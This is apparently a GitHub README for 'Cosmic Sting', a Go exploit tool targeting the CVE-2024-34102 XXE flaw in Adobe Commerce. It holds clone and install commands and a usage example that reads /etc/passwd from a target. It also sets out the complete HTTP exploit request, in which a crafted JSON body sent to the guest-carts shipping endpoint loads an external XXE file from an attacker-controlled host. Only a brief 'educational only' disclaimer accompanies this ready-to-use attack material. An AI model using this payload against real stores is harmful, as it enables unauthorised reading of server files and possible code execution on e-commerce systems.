Cosmic Sting is a Go-based tool designed to exploit CVE-2024-34102, Remote Code Execution vulnerability.
Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.
- Go (1.16 or higher)
-
Clone the repository:
git clone https://github.com/bughuntar/CVE-2024-34102.git && cd CVE-2024-34102
-
Install dependencies (if any):
go version && go mod init cosmic_sting && go get github.com/fatih/color && go get github.com/google/uuid && go get github.com/urfave/cli/v2
To run the tool with a single URL:
go run cosmic_sting.go -u "http://example.com" -f "/etc/passwd"-u,--url: Single URL to exploit.-f,--file: File to read via SSRF.-l,--list: File containing list of URLs to exploit.
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Type: application/json
Content-Length: 187
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://{{hostedXMLfile.com}}/xxe.xml","dataIsURL":true,"options":1234}}}}}}
This project is not licensed, only made for personal project.
Contributions are welcome! Please open an issue or submit a pull request for any changes.
This tool is intended for educational purposes only. Use it responsibly and only on systems you have permission to test.
Professor the Hunter --> Follow me on Twitter